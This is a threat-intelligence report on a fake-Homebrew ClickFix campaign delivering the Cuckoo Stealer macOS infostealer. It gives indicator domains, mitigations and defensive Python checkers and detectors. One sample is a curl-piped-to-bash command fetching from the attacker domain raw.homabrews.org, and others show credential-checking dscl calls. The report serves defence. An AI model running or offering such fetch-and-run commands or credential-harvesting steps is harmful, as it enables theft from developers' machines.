A sophisticated social engineering campaign uses the ClickFix technique to deliver Cuckoo Stealer, a full-featured macOS infostealer and remote access trojan, through typosquatted Homebrew installation pages aimed at macOS developers worldwide. Attackers built high-fidelity clones of the legitimate Homebrew website (brew.sh) across multiple typosquatted domains hosted on shared infrastructure, tricking macOS developers into executing modified curl commands that fetch a credential-harvesting loader followed by the second-stage Cuckoo Stealer binary. The campaign targets the software development, technology, and cryptocurrency industries globally while excluding CIS countries, exploiting developer trust in the widely used Homebrew package manager. Cuckoo Stealer, as deployed through the fake Homebrew sites, can exfiltrate browser credentials, cryptocurrency wallets, macOS Keychain data, messaging application sessions including Discord and Telegram, and financial data from over twenty cryptocurrency applications. First observed on January 13, 2026, the fake Homebrew campaign funnels macOS victims to the typosquatted domains through search engine poisoning, malicious advertisements, and deceptive look-alike URLs, delivering Cuckoo Stealer disguised as a legitimate Homebrew installation script.
A social engineering campaign targets macOS users by impersonating the official Homebrew package manager website and weaponizing developer trust in this essential macOS tool. Victims are funneled to typosquatted Homebrew domains through search engine poisoning, malicious advertisements, and deceptive look-alike URLs mimicking the legitimate brew.sh domain. The threat actors built near pixel-perfect clones of the legitimate Homebrew site, carefully replicating its branding, layout, and multilingual functionality. The deception hinges on a subtle modification to the installation command displayed on the typosquatted sites: instead of pulling from the legitimate raw.githubusercontent.com domain, the malicious script is fetched from raw.homabrews[.]org, a small alteration that easily evades casual inspection. A JavaScript-powered “Copy” button on the fake sites silently places the malicious curl command into the user’s clipboard, exploiting the common developer workflow of pasting the Homebrew installation command directly into Terminal.
Once the fake Homebrew command is executed, the tampered curl command retrieves a trojanized installer script from attacker-controlled infrastructure. Malicious logic is injected into what otherwise looks like the standard Homebrew installation routine. The first-stage Cuckoo Stealer payload focuses on credential harvesting, repeatedly prompting the user for their macOS password. The script validates each entry with the native macOS dscl utility and its authonly verb, which checks credentials without creating a login session or generating authentication logs, making the theft hard to detect. Failed attempts return a convincing “Sorry, try again” message mimicking normal sudo behavior. Once a valid password has been captured, the script downloads a secondary binary named brew_agent into /tmp, Base64-encodes the stolen password, and passes it to the binary as a parameter. This stage deploys the full Cuckoo Stealer malware, which initializes command-and-control communications, generates a unique session identifier, collects environment data, and removes the macOS quarantine attribute via xattr to suppress Gatekeeper warnings. Cuckoo Stealer also performs locale-based filtering to avoid systems configured for CIS regions and uses custom XOR-based string obfuscation with rotating keys to evade static detection.
To maintain persistence on compromised macOS systems, Cuckoo Stealer abuses the macOS LaunchAgent mechanism, registering itself as com.homebrew.brewupdater.plist to blend in as a legitimate Homebrew component. The Cuckoo Stealer binary is copied into hidden macOS directories such as .local-{session_id} under the name BrewUpdater. Cuckoo Stealer command-and-control traffic is encrypted over HTTPS using X25519 elliptic curve Diffie-Hellman key exchange, generating ephemeral key pairs to derive shared secrets for session encryption. The Cuckoo Stealer malware implements a compact RAT protocol supporting arbitrary shell execution on macOS, silent command execution, system reboot, self-destruct routines with LaunchAgent cleanup, and granular exfiltration controls. Cuckoo Stealer commands are transmitted as single-byte identifiers within pipe-delimited beacon structures and encrypted using XOR keys derived from MD5 hashes for macOS C2 communications.
Cuckoo Stealer’s data exfiltration capabilities are extensive and financially motivated, targeting macOS users in software development and cryptocurrency industries. The malware silently captures screenshots using the macOS screencapture -x utility and establishes secondary socket channels for interactive file browsing on compromised macOS systems. Before sensitive activity, Cuckoo Stealer mutes system audio via AppleScript to reduce user awareness during exfiltration. Browser credential theft targets Chromium-based browsers on macOS, extracting cookies, saved logins, autofill records, browsing history, bookmarks, and installed extensions, particularly cryptocurrency wallet extensions including Coinbase Wallet, Phantom, Binance Wallet, and Rabby. Cuckoo Stealer also exfiltrates the macOS Keychain directory, Apple Notes databases, Discord tokens, Telegram session data, FileZilla credentials, OpenVPN profiles, Steam session files, and wallet data from over twenty cryptocurrency applications including node wallets for Bitcoin, Litecoin, Dogecoin, Raven, and DashCore, demonstrating deliberate focus on harvesting high-value financial assets from macOS developers at scale.
macOS users must always verify the legitimacy of Homebrew installation commands by confirming the source URL before executing any curl-based installation command in Terminal. Bookmark the legitimate brew.sh website to avoid reliance on search engine results that may be poisoned with fake Homebrew typosquatted domains. Only execute Homebrew installation commands from the verified official brew.sh domain.
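The check above (and the host swap described earlier, raw.githubusercontent.com replaced by raw.homabrews[.]org) can be automated before anything copied from a web page is run. The following is an added example, not code from the report or from the Homebrew project: it pulls every URL out of a pasted install command and accepts it only when each download host is on a trusted list and uses HTTPS. The genuine command is the one-liner as published on brew.sh; the fake command uses the raw.homabrews.org host named in the report, but its script path is constructed for the example, since the report does not give it.

```python
import re
from urllib.parse import urlparse

# Download hosts the genuine Homebrew one-liner on brew.sh fetches from.
# Anything else in a pasted "install Homebrew" command is treated as untrusted.
TRUSTED_HOSTS = {"raw.githubusercontent.com"}

# Constructed sample commands. The genuine one is the shape shown on brew.sh;
# the fake one uses the raw.homabrews.org host from the report with a made-up
# script path (the report does not state the path).
GENUINE_CMD = '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'
FAKE_CMD = '/bin/bash -c "$(curl -fsSL https://raw.homabrews.org/install.sh)"'

URL_RE = re.compile(r"https?://[^\s\"')]+")


def extract_urls(command: str) -> list:
    """Return every http(s) URL embedded in a shell command string."""
    return URL_RE.findall(command)


def check_install_command(command: str) -> dict:
    """Classify a pasted install command before it is run.

    Returns {"ok": bool, "hosts": [...], "reasons": [...]}; "ok" is True only
    when every download host is on the trusted list and is fetched over https.
    """
    reasons, hosts = [], []
    urls = extract_urls(command)
    if not urls:
        reasons.append("no download URL found in command")
    for url in urls:
        host = (urlparse(url).hostname or "").lower()
        hosts.append(host)
        if host not in TRUSTED_HOSTS:
            reasons.append(f"untrusted download host: {host}")
        if url.startswith("http://"):
            reasons.append(f"plaintext http download: {url}")
    return {"ok": not reasons, "hosts": hosts, "reasons": reasons}


if __name__ == "__main__":
    for cmd in (GENUINE_CMD, FAKE_CMD):
        verdict = check_install_command(cmd)
        print("OK " if verdict["ok"] else "BAD", cmd)
        for reason in verdict["reasons"]:
            print("    -", reason)
```

The point of the host allowlist is that a look-alike such as raw.homabrews.org is rejected by exact comparison rather than by a human eye that reads "brew" and moves on; extend TRUSTED_HOSTS only with hosts you have confirmed from the official brew.sh page.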
Organizations must immediately block identified malicious Homebrew typosquatted domains (homabrews[.]org, brewsh[.]cx, brrewsh[.]org, brewshh[.]org, brewmacos[.]com) and IP address 5.255.123[.]244 at DNS, proxy, and firewall levels across all organizational macOS endpoints to prevent Cuckoo Stealer infections from fake Homebrew campaigns.
Security teams must review all LaunchAgent plists in ~/Library/LaunchAgents/ on macOS systems for suspicious entries, specifically checking for com.homebrew.brewupdater.plist or any plist referencing binaries in hidden directories matching the pattern “.local-” within user home directories, indicating potential Cuckoo Stealer persistence from fake Homebrew compromise.
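The LaunchAgent review above can be scripted. This is an added example, not code from the report: it parses each plist with the standard library's plistlib and reports the indicators the report gives (the com.homebrew.brewupdater label and filename, a binary named BrewUpdater, and any program path inside a hidden ".local-…" directory). The sample plists are constructed for the example; the session id and home directory in the malicious one are invented.

```python
import plistlib
import re
from pathlib import Path

# Indicators from the report: the persistence label/filename and the hidden
# ".local-{session_id}" directory that holds the BrewUpdater binary.
SUSPICIOUS_LABEL = "com.homebrew.brewupdater"
SUSPICIOUS_BINARY = "BrewUpdater"
HIDDEN_DIR_RE = re.compile(r"/\.local-[^/]+/")


def referenced_programs(plist: dict) -> list:
    """Every executable path a LaunchAgent plist can point launchd at."""
    refs = []
    if isinstance(plist.get("Program"), str):
        refs.append(plist["Program"])
    args = plist.get("ProgramArguments")
    if isinstance(args, list):
        refs.extend(str(a) for a in args)
    return refs


def inspect_plist(data: bytes, path: str) -> list:
    """Return a list of findings for one plist (empty means nothing suspicious)."""
    try:
        plist = plistlib.loads(data)
    except Exception:  # plistlib raises different errors for non-plist vs malformed XML
        return [f"{path}: not a parseable plist"]
    if not isinstance(plist, dict):
        return [f"{path}: top-level object is not a dictionary"]
    findings = []
    if Path(path).name.lower() == SUSPICIOUS_LABEL + ".plist":
        findings.append(f"{path}: filename matches Cuckoo Stealer persistence plist")
    if str(plist.get("Label", "")).lower() == SUSPICIOUS_LABEL:
        findings.append(f"{path}: Label is {SUSPICIOUS_LABEL}")
    for ref in referenced_programs(plist):
        if HIDDEN_DIR_RE.search(ref):
            findings.append(f"{path}: runs a binary from a hidden .local-* directory: {ref}")
        if Path(ref).name == SUSPICIOUS_BINARY:
            findings.append(f"{path}: runs a binary named {SUSPICIOUS_BINARY}: {ref}")
    return findings


def scan_launch_agents(directory: Path) -> list:
    """Inspect every *.plist in a LaunchAgents directory (e.g. ~/Library/LaunchAgents)."""
    findings = []
    for p in sorted(directory.glob("*.plist")):
        findings.extend(inspect_plist(p.read_bytes(), str(p)))
    return findings


# Constructed samples: one shaped like the report's persistence entry
# (session id and home directory invented) and a benign one for contrast.
MALICIOUS_PLIST = plistlib.dumps({
    "Label": "com.homebrew.brewupdater",
    "ProgramArguments": ["/Users/dev/.local-a1b2c3d4/BrewUpdater"],
    "RunAtLoad": True,
    "KeepAlive": True,
})
BENIGN_PLIST = plistlib.dumps({
    "Label": "com.example.backup",
    "ProgramArguments": ["/usr/local/bin/backup", "--daily"],
    "RunAtLoad": True,
})

if __name__ == "__main__":
    # On a live system: scan_launch_agents(Path.home() / "Library" / "LaunchAgents")
    for line in inspect_plist(MALICIOUS_PLIST, "~/Library/LaunchAgents/com.homebrew.brewupdater.plist"):
        print(line)
```

Because the malware copies itself under a name chosen to look like a Homebrew component, the strongest signal here is not the name but the location: a LaunchAgent whose program lives in a dot-prefixed directory directly under a user's home has no legitimate Homebrew counterpart.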
Organizations should create detection rules for macOS processes invoking the dscl command with the authonly verb outside expected authentication workflows, as this indicates potential credential harvesting activity consistent with Cuckoo Stealer’s first-stage payload deployed through fake Homebrew campaigns.
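A detection of the kind described above, for the dscl authonly credential check from the first-stage script, can be prototyped over process-execution telemetry. This is an added example, not code from the report or any vendor: it flags every dscl invocation carrying the authonly verb (dscl accepts it as authonly or -authonly), escalates when the same parent process makes repeated attempts within a short window (the report notes the script prompts repeatedly), and redacts the password argument so the alert itself does not leak it. The events are constructed JSON lines whose field names are an assumption for this example, not any particular EDR schema.

```python
import json
from collections import defaultdict
from datetime import datetime

# Constructed sample events in a generic process-execution JSON-lines shape.
# Field names are assumed for this example; the password strings are invented
# and are present only to show that the detector redacts them.
SAMPLE_EVENTS = """\
{"ts": "2026-02-01T09:00:01Z", "pid": 511, "ppid": 480, "parent": "/bin/bash", "exe": "/usr/bin/dscl", "args": ["dscl", ".", "-authonly", "dev", "wrong-guess"]}
{"ts": "2026-02-01T09:00:12Z", "pid": 512, "ppid": 480, "parent": "/bin/bash", "exe": "/usr/bin/dscl", "args": ["dscl", ".", "-authonly", "dev", "real-password"]}
{"ts": "2026-02-01T09:05:00Z", "pid": 600, "ppid": 1, "parent": "/sbin/launchd", "exe": "/usr/bin/dscl", "args": ["dscl", ".", "-read", "/Users/dev", "UserShell"]}
{"ts": "2026-02-01T09:06:00Z", "pid": 601, "ppid": 480, "parent": "/bin/bash", "exe": "/usr/bin/curl", "args": ["curl", "-fsSL", "https://example.invalid/x"]}
"""


def parse_events(text: str) -> list:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def authonly_index(args: list) -> int:
    """Index of the authonly verb (with or without its leading dash), or -1."""
    for i, a in enumerate(args[1:], start=1):
        if a.lstrip("-").lower() == "authonly":
            return i
    return -1


def is_dscl_authonly(event: dict) -> bool:
    return event["exe"].rsplit("/", 1)[-1] == "dscl" and authonly_index(event["args"]) >= 0


def redact(args: list) -> list:
    """Keep 'dscl . -authonly <user>' and replace everything after the username."""
    i = authonly_index(args)
    keep = args[: i + 2]
    return keep + ["<redacted>"] * (len(args) - len(keep))


def detect_authonly_harvesting(events: list, window_s: int = 120) -> list:
    """Alert on each dscl authonly run; escalate repeats from the same parent within window_s."""
    alerts = []
    attempts = defaultdict(list)  # ppid -> timestamps of authonly runs
    for ev in events:
        if not is_dscl_authonly(ev):
            continue
        t = datetime.fromisoformat(ev["ts"].replace("Z", "+00:00"))
        history = attempts[ev["ppid"]]
        history.append(t)
        recent = [x for x in history if (t - x).total_seconds() <= window_s]
        alerts.append({
            "ts": ev["ts"],
            "pid": ev["pid"],
            "parent": ev["parent"],
            "severity": "high" if len(recent) >= 2 else "medium",
            "args": redact(ev["args"]),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_authonly_harvesting(parse_events(SAMPLE_EVENTS)):
        print(json.dumps(alert))
```

In production the parent process is the field to tune on: an interactive shell or a script spawned from curl invoking dscl authonly is the pattern from this campaign, whereas any administrative tooling your environment legitimately runs this way should be allowlisted by parent path rather than by suppressing the rule.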
Implement browser extension whitelisting policies to protect cryptocurrency wallet extensions (Coinbase Wallet, Phantom Wallet, Binance Wallet, Rabby Wallet) on macOS from unauthorized Local Storage and IndexedDB access by malicious processes like Cuckoo Stealer deployed through fake Homebrew social engineering.
If evidence of Cuckoo Stealer compromise from fake Homebrew campaigns is found, immediately rotate all credentials stored in macOS Keychain, browser password managers, FTP clients (FileZilla), VPN configurations (OpenVPN), and messaging application sessions (Discord, Telegram), as Cuckoo Stealer targets all of these credential stores on compromised macOS systems.
Deploy DNS monitoring solutions capable of detecting typosquatting patterns targeting commonly used developer tools and package managers like Homebrew, with automated alerting for domains closely resembling legitimate software distribution infrastructure used by macOS developers.
homabrews[.]org, raw[.]brewsh[.]cx, braw[.]sh, brewsh[.]cx, brew[.]lat, brew[.]pages[.]dev, brrewsh[.]org, brewmacos[.]com
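The DNS-monitoring recommendation above can be approximated with a small look-alike check run over resolver logs. This is an added example, not code from the report or any DNS product: it compares each queried name against the Homebrew brand tokens using a substring test and Levenshtein edit distance, after allowlisting the genuine hosts. The sample query list is constructed for the example and mixes the report's indicator domains (refanged) with ordinary developer traffic; the allowlist entries formulae.brew.sh and docs.brew.sh are real Homebrew subdomains added here as an assumption about what a developer network normally resolves.

```python
from typing import Optional

# Genuine hosts that contain the brand token and must never be flagged.
ALLOWLIST = {"brew.sh", "formulae.brew.sh", "docs.brew.sh", "github.com", "raw.githubusercontent.com"}

# Constructed DNS query log: the report's typosquat domains (refanged) mixed
# with ordinary developer traffic.
SAMPLE_QUERIES = [
    "brew.sh", "raw.githubusercontent.com", "formulae.brew.sh", "registry.npmjs.org",
    "cdn.jsdelivr.net", "homabrews.org", "raw.brewsh.cx", "braw.sh", "brewsh.cx",
    "brew.lat", "brew.pages.dev", "brrewsh.org", "brewmacos.com",
]


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance via the classic two-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        cur = [i]
        for j, cb in enumerate(b, start=1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_reason(name: str) -> Optional[str]:
    """Explain why a query name looks like a Homebrew look-alike, or return None."""
    name = name.lower().rstrip(".")
    if name in ALLOWLIST:
        return None
    labels = name.split(".")
    joined = "".join(labels[:-1])  # everything but the TLD, e.g. "rawbrewsh"
    for label in labels:
        if "brew" in label:
            return f"label {label!r} contains brand token 'brew'"
        if edit_distance(label, "brew") <= 1:
            return f"label {label!r} is within 1 edit of 'brew'"
    if edit_distance(joined, "brewsh") <= 1:
        return f"{joined!r} is within 1 edit of 'brewsh'"
    return None


def flag_typosquats(queries: list) -> dict:
    """Map each suspicious query name to the reason it was flagged."""
    flagged = {}
    for q in queries:
        reason = typosquat_reason(q)
        if reason:
            flagged[q] = reason
    return flagged


if __name__ == "__main__":
    for domain, reason in flag_typosquats(SAMPLE_QUERIES).items():
        print(f"{domain:28} {reason}")
```

The substring rule catches the bulk of this campaign's domains (homabrews, brewmacos, brewsh); the edit-distance rule is what catches braw.sh and brrewsh.org, which contain no intact "brew". Expect false positives from unrelated names that happen to contain the token, which is why the allowlist and an analyst review step belong in front of any automated block.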